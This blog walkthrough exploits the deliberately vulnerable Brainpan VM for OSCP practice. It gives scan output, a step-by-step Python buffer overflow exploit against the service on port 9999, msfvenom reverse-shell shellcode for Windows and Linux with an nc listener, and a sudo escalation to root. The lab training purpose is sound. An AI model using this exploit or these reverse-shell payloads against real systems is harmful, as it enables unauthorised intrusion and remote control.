Hi Techmates! Brainpan is a vulnerable virtual machine which is designed for people who are preparing for OSCP or wants to exploit buffer overflow vulnerability. This blog will take you through exploiting Brainpan step by step.
Direct links to download the virtual machine - http://download.vulnhub.com/brainpan/Brainpan.zip
Setting up the Virtual Machine:
- Download the ZIP file “brainpan.zip”.
- Extract the file in a folder.
- Import the “brainpan.ova” file in Virtualbox or VMWare.
- The network connectivity is set to Bridge by default. You can change it according to the requirement. If you are not sure do not change the default setting.
- Start the Virtualbox/VMWare.
Attacker’s IP - 192.168.43.204
Victim’s IP(Brainpan) - Step 1
Exploiting Brainpan:
Step 1: Discovering the IP Address
- Discover the active host in the network using-
- Nmap - nmap 192.168.43.1/24
- Netdiscover - netdiscover
- Brainpan VM is running on 192.168.43.205
Step 2: Scanning
- Nmap - nmap -sC -sV -vv -Pn -p 1-65535 192.168.43.205
#nmap -Pn -sC -sV -vv -A 192.168.43.205 -p 1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-26 08:22 IST Warning: File ./nmap.xsl exists, but Nmap is using /usr/bin/../share/nmap/nmap.xsl for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too). NSE: Loaded 148 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 08:22 Completed NSE at 08:22, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 08:22 Completed NSE at 08:22, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 08:22 Completed Parallel DNS resolution of 1 host. at 08:22, 4.09s elapsed Initiating Connect Scan at 08:22 Scanning 192.168.43.205 [65535 ports] Discovered open port 9999/tcp on 192.168.43.205 Discovered open port 10000/tcp on 192.168.43.205 Completed Connect Scan at 08:22, 0.88s elapsed (65535 total ports) Initiating Service scan at 08:22 Scanning 2 services on 192.168.43.205 Completed Service scan at 08:22, 6.11s elapsed (2 services on 1 host) NSE: Script scanning 192.168.43.205. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 08:22 NSE Timing: About 99.64% done; ETC: 08:23 (0:00:00 remaining) Completed NSE at 08:23, 31.09s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 08:23 Completed NSE at 08:23, 0.04s elapsed Nmap scan report for 192.168.43.205 Host is up, received user-set (0.00016s latency). Scanned at 2018-10-26 08:22:27 IST for 38s Not shown: 65533 closed ports Reason: 65533 conn-refused PORT STATE SERVICE REASON VERSION 9999/tcp open abyss? syn-ack | fingerprint-strings: | NULL: | _| _| | _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| | _|_| _| _| _| _| _| _| _| _| _| _| _| | _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _| | [______________________ WELCOME TO BRAINPAN _______________________] |_ ENTER THE PASSWORD 10000/tcp open http syn-ack SimpleHTTPServer 0.6 (Python 2.7.3) | http-methods: |_ Supported Methods: GET HEAD |_http-title: Site doesn't have a title (text/html). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9999-TCP:V=7.70%I=7%D=10/26%Time=5BD28172%P=x86_64-pc-linux-gnu%r(N SF:ULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\ SF:|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20 SF:\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\ SF:x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\ SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\ SF:x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\ SF:|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\ SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\ SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\ SF:x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20 SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\ SF:x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\ SF:x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\ SF:x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20>>\x20"); NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 08:23 Completed NSE at 08:23, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 08:23 Completed NSE at 08:23, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 43.27 seconds |
We have two tcp ports open: 9999 - abyss, 10000 - http.
- Nikto - nikto -h 192.168.43.205 -p 10000
# sudo nikto -h 192.168.43.205 -p 10000
- Nikto v2.1.6 + Target IP: 192.168.43.205 + Target Hostname: 192.168.43.205 + Target Port: 10000 + Start Time: 2018-10-26 08:26:22 (GMT5.5) + Server: SimpleHTTP/0.6 Python/2.7.3 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + SimpleHTTP/0.6 appears to be outdated (current is at least 1.2) + Python/2.7.3 appears to be outdated (current is at least 2.7.5) + OSVDB-3092: /bin/: This might be interesting... + OSVDB-3092: /bin/: This might be interesting... possibly a system shell found. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response + Scan terminated: 20 error(s) and 7 item(s) reported on remote host + End Time: 2018-10-26 08:26:30 (GMT5.5) (8 seconds) + 1 host(s) tested |
Step 3: Browse http://192.168.43.205:10000/. Checking the source code of the given page also doesn’t reveal much information.
Exhibit 1
Step 4: Run a Dirbuster scan - dirb http://192.168.43.205:10000/
#dirb http://192.168.43.205:10000/
----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Nov 1 18:23:17 2018 URL_BASE: http://192.168.43.205:10000/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.43.205:10000/ ---- + http://192.168.43.205:10000/bin (CODE:301|SIZE:0) + http://192.168.43.205:10000/index.html (CODE:200|SIZE:215) ----------------- END_TIME: Thu Nov 1 18:23:24 2018 DOWNLOADED: 4612 - FOUND: 2 |
Step 5: Here is what’s seen when connecting to 192.168.43.205:9999 using netcat:
- nc 192.168.43.205 9999
Exhibit 2
Step 6: Try entering any password, it shows access denied.
Step 7: Browse http://192.168.43.205:10000/bin. We can see “brainpan.exe file which is a windows executable file.
Exhibit 3
Step 8: Let us check this file using “file” command.
Exhibit 4
Step 9: Let us check the file using “strings” command - Strings brainpan.exe. Let us take a look at the functions executables.
Exhibit 5
Since the application uses functions like socket, send, bind, recv, listen and accept, we can tell that it is a network server application. Functions like strcmp, strlen, printf and strcpy is also used. Strcpy is an important function since it is vulnerable to buffer overflow attack.
Step 10: Install Immunity debugger in windows machine and copy the executable. Click on File → Open → Brainpan.exe. Press f9 or click on run.
Exhibit 6
Step 11: We can see the service running on port 9999 and the function ‘strcpy’ vulnerable to buffer overflow attack. Lets us write a simple attacker’s script to see if we can crash the application. The following python script will connect to the service and send 1000 "A"s to the service:
import sys,socket
host = "192.168.43.88" #IP Address of Windows Machine port = 9999 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((host,port)) s.recv(1024) junk = b"A"*524 s.sendall(junk) print "Sent" except: print "Unable to connect " + str(host) sys.exit(0) |
Step 12: Save the file as exploit_brainpan.py. Executing the exploit from Kali linux - python exploit_brainpan.py.
Exhibit 7
Step 13: As soon as the payload is sent you notice that the EIP has been overwritten with 41414141 i.e. “AAAA” in Immunity Debugger.
Exhibit 8
Step 14: Thus, EIP has been successfully overwritten with A’s (ox41). The next step would be to determine after how many bytes the EIP is being overwritten. We will be using pattern_create and patter_offset using metasploit framework. To create a pattern go to /usr/share/metasploit-framework/tools/exploit/ and type the given command:
#./pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B |
Step 15: We will take this pattern and replace the 1000 "A"s in our exploit with this entire pattern, so our exploit now looks like:
import sys,socket
host = "192.168.43.88" port = 9999 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: print "Connecting to " +str(host) s.connect((host,port)) s.recv(1024) junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" print "Sending Payload..." s.sendall(junk) print "Sent" except: print "Unable to connect " + str(host) sys.exit(0) |
Step 16: Execute the script. Executing the program we see that the EIP is overwritten with 35724134.
Exhibit 9
Step 17: Let us check the pattern_offset using metasploit framework. Type the given command in the terminal.
Exhibit 10
Step 18: The updated attacker’s code will look like:
import sys,socket
host = "192.168.43.88" port = 9999 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: print "Connecting to " +str(host) s.connect((host,port)) s.recv(1024) junk = b"A"*524 EIP = b"BBBB" payload = b'C'*500 print "Sending Payload..." s.sendall(junk+EIP+payload) print "Sent" except: print "Unable to connect " + str(host) sys.exit(0) |
Step 19: Execute the script. You will notice that the EIP gets overwritten with 42424242 i.e. BBBB.
Exhibit 11
Step 20: Now we need to overwrite the EIP with JMP ESP address.So we need to find an instruction like jmp esp, call esp, or push esp; ret.
Go to View→ Executable Modules and select the DLL file i.e. brainpan.exe whose SafeSEH and ASLR is set to False. This memory addresses containing a jmp esp instructions is good to put in EIP and make the flow jump to our Shellcode.
Exhibit 12
Step 21: Right click and click on Search→ Command.
Exhibit 13
Step 22: Enter the command JMP ESP and click on Find. You will notice JMP ESP in address 311712F3.
Exhibit 14
Step 23: Change the EIP with JMP ESP code.
Note: The EIP address is arranged in backward as it is sent to the stack i.e. \xf3\x12\x17\x31.
Step 24: Let us send the following exploit to the application.
import sys,socket
host = "192.168.43.88" port = 9999 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: print "Connecting to " +str(host) s.connect((host,port)) s.recv(1024) junk = b"A"*524 EIP = b'\xf3\x12\x17\x31' payload = b"C"*10+b"D"*10 print "Sending Payload..." s.sendall(junk+EIP+payload) print "Sent" except: print "Unable to connect " + str(host) sys.exit(0) |
Step 25: Send the payload. You can notice that the ESP gets overwritten with 10 D’s. Thus the first 10 C’s used has to be set to \x90 i.e. No operation value.
Exhibit 15
Step 26: The next step would be creating a payload. To create a reverse TCP Shellcode open terminal and type the following command in the terminal.
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.204 LPORT=1234 R -e x86/shikata_ga_nai -b '\x00' -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of c file: 1500 bytes unsigned char buf[] = "\xdb\xc2\xbb\xd5\x90\x9d\x1c\xd9\x74\x24\xf4\x58\x29\xc9\xb1" "\x52\x31\x58\x17\x83\xe8\xfc\x03\x8d\x83\x7f\xe9\xd1\x4c\xfd" "\x12\x29\x8d\x62\x9a\xcc\xbc\xa2\xf8\x85\xef\x12\x8a\xcb\x03" "\xd8\xde\xff\x90\xac\xf6\xf0\x11\x1a\x21\x3f\xa1\x37\x11\x5e" "\x21\x4a\x46\x80\x18\x85\x9b\xc1\x5d\xf8\x56\x93\x36\x76\xc4" "\x03\x32\xc2\xd5\xa8\x08\xc2\x5d\x4d\xd8\xe5\x4c\xc0\x52\xbc" "\x4e\xe3\xb7\xb4\xc6\xfb\xd4\xf1\x91\x70\x2e\x8d\x23\x50\x7e" "\x6e\x8f\x9d\x4e\x9d\xd1\xda\x69\x7e\xa4\x12\x8a\x03\xbf\xe1" "\xf0\xdf\x4a\xf1\x53\xab\xed\xdd\x62\x78\x6b\x96\x69\x35\xff" "\xf0\x6d\xc8\x2c\x8b\x8a\x41\xd3\x5b\x1b\x11\xf0\x7f\x47\xc1" "\x99\x26\x2d\xa4\xa6\x38\x8e\x19\x03\x33\x23\x4d\x3e\x1e\x2c" "\xa2\x73\xa0\xac\xac\x04\xd3\x9e\x73\xbf\x7b\x93\xfc\x19\x7c" "\xd4\xd6\xde\x12\x2b\xd9\x1e\x3b\xe8\x8d\x4e\x53\xd9\xad\x04" "\xa3\xe6\x7b\x8a\xf3\x48\xd4\x6b\xa3\x28\x84\x03\xa9\xa6\xfb" "\x34\xd2\x6c\x94\xdf\x29\xe7\x5b\xb7\x1a\x3b\x33\xca\x5c\xc7" "\x16\x43\xba\xad\x86\x02\x15\x5a\x3e\x0f\xed\xfb\xbf\x85\x88" "\x3c\x4b\x2a\x6d\xf2\xbc\x47\x7d\x63\x4d\x12\xdf\x22\x52\x88" "\x77\xa8\xc1\x57\x87\xa7\xf9\xcf\xd0\xe0\xcc\x19\xb4\x1c\x76" "\xb0\xaa\xdc\xee\xfb\x6e\x3b\xd3\x02\x6f\xce\x6f\x21\x7f\x16" "\x6f\x6d\x2b\xc6\x26\x3b\x85\xa0\x90\x8d\x7f\x7b\x4e\x44\x17" "\xfa\xbc\x57\x61\x03\xe9\x21\x8d\xb2\x44\x74\xb2\x7b\x01\x70" "\xcb\x61\xb1\x7f\x06\x22\xc1\x35\x0a\x03\x4a\x90\xdf\x11\x17" "\x23\x0a\x55\x2e\xa0\xbe\x26\xd5\xb8\xcb\x23\x91\x7e\x20\x5e" |
Step 27: Now the final shellcode looks like:
import sys,socket
host = "169.254.255.83" port = 9999 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: print "Connecting to " +str(host) s.connect((host,port)) s.recv(1024) junk = b"A"*524 EIP = b'\xf3\x12\x17\x31' nops=b'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=1234 R -e x86/shikata_ga_nai -b '\x00' -f c payload = b'\xbd\x39\x83\xf4\x35\xd9\xc0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\xd3\x7f\x16\xc0\xdf\x68\x55\x2b\x1f\x69\x3a\xa5\xfa\x58\x7a\xd1\x8f\xcb\x4a\x91\xdd\xe7\x21\xf7\xf5\x7c\x47\xd0\xfa\x35\xe2\x06\x35\xc5\x5f\x7a\x54\x45\xa2\xaf\xb6\x74\x6d\xa2\xb7\xb1\x90\x4f\xe5\x6a\xde\xe2\x19\x1e\xaa\x3e\x92\x6c\x3a\x47\x47\x24\x3d\x66\xd6\x3e\x64\xa8\xd9\x93\x1c\xe1\xc1\xf0\x19\xbb\x7a\xc2\xd6\x3a\xaa\x1a\x16\x90\x93\x92\xe5\xe8\xd4\x15\x16\x9f\x2c\x66\xab\x98\xeb\x14\x77\x2c\xef\xbf\xfc\x96\xcb\x3e\xd0\x41\x98\x4d\x9d\x06\xc6\x51\x20\xca\x7d\x6d\xa9\xed\x51\xe7\xe9\xc9\x75\xa3\xaa\x70\x2c\x09\x1c\x8c\x2e\xf2\xc1\x28\x25\x1f\x15\x41\x64\x48\xda\x68\x96\x88\x74\xfa\xe5\xba\xdb\x50\x61\xf7\x94\x7e\x76\xf8\x8e\xc7\xe8\x07\x31\x38\x21\xcc\x65\x68\x59\xe5\x05\xe3\x99\x0a\xd0\xa4\xc9\xa4\x8b\x04\xb9\x04\x7c\xed\xd3\x8a\xa3\x0d\xdc\x40\xcc\xa4\x27\x03\x33\x90\x26\xd5\xdb\xe3\x28\xdd\xc9\x6d\xce\xb7\xfd\x3b\x59\x20\x67\x66\x11\xd1\x68\xbc\x5c\xd1\xe3\x33\xa1\x9c\x03\x39\xb1\x49\xe4\x74\xeb\xdc\xfb\xa2\x83\x83\x6e\x29\x53\xcd\x92\xe6\x04\x9a\x65\xff\xc0\x36\xdf\xa9\xf6\xca\xb9\x92\xb2\x10\x7a\x1c\x3b\xd4\xc6\x3a\x2b\x20\xc6\x06\x1f\xfc\x91\xd0\xc9\xba\x4b\x93\xa3\x14\x27\x7d\x23\xe0\x0b\xbe\x35\xed\x41\x48\xd9\x5c\x3c\x0d\xe6\x51\xa8\x99\x9f\x8f\x48\x65\x4a\x14\x78\x2c\xd6\x3d\x11\xe9\x83\x7f\x7c\x0a\x7e\x43\x79\x89\x8a\x3c\x7e\x91\xff\x39\x3a\x15\xec\x33\x53\xf0\x12\xe7\x54\xd1' print "Sending Payload..." s.sendall(junk+EIP+nops+payload) print "Sent" except: print "Unable to connect " + str(host) sys.exit(0) |
Step 28: We will run our exploit now. Before running the exploit run 'nc -nvlp 1234' on your attacking machine:
nc -nvlp 1234
|
Step 29: Run the exploit. We have a reverse shell on our WinXP test machine!
Exhibit 16
Step 30: Now we need to generate a new shellcode for linux and run it against the brainpan machine.
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.43.204 LPORT=1234 R -e x86/alpha_upper -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/alpha_upper x86/alpha_upper succeeded with size 205 (iteration=0) x86/alpha_upper chosen with final size 205 Payload size: 205 bytes Final size of c file: 886 bytes unsigned char buf[] = "\x89\xe6\xd9\xe1\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x36\x51\x39\x4b\x4c\x37\x4d\x33" "\x56\x33\x31\x53\x30\x53\x33\x5a\x54\x42\x4c\x49\x4b\x51\x58" "\x30\x53\x56\x58\x4d\x4d\x50\x4a\x33\x46\x39\x58\x30\x47\x4f" "\x58\x4d\x4b\x30\x30\x49\x52\x59\x4b\x49\x45\x38\x49\x50\x4f" "\x58\x36\x4b\x38\x4c\x43\x58\x45\x52\x55\x50\x34\x44\x48\x52" "\x4b\x39\x4b\x51\x48\x30\x32\x46\x50\x50\x50\x51\x50\x53\x4e" "\x53\x35\x53\x4d\x59\x4b\x51\x38\x4d\x4d\x50\x56\x32\x52\x48" "\x52\x4e\x56\x4f\x42\x53\x42\x48\x33\x58\x46\x4f\x46\x4f\x45" "\x32\x32\x49\x4d\x59\x4d\x33\x51\x42\x50\x53\x4d\x59\x4b\x51" "\x4e\x50\x54\x4b\x38\x4d\x4d\x50\x41\x41"; |
Step 31: We now have a low privileged shell on our victim machine. Let’s continue.
Exhibit 17
Step 32: We’ll take a look in the home directory to see if there is anything interesting…. nope. The only thing noticeable is that there is a script which restarts the web service should it die, as well as the root of the web service running on port 10000. Let us check if we have any special permissions we can use with sudo.
#sudo -l
Matching Defaults entries for puck on this host: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User puck may run the following commands on this host: (root) NOPASSWD: /home/anansi/bin/anansi_util |
Step 33: Type python -c "import pty; pty.spawn('/bin/bash')". The - manual [command] part stands out immediately. Let’s see if we can run a [command] with root privileges.
Exhibit 18
Bingo!! We got the root access.
Exhibit 20
Hope you learned and enjoyed it!!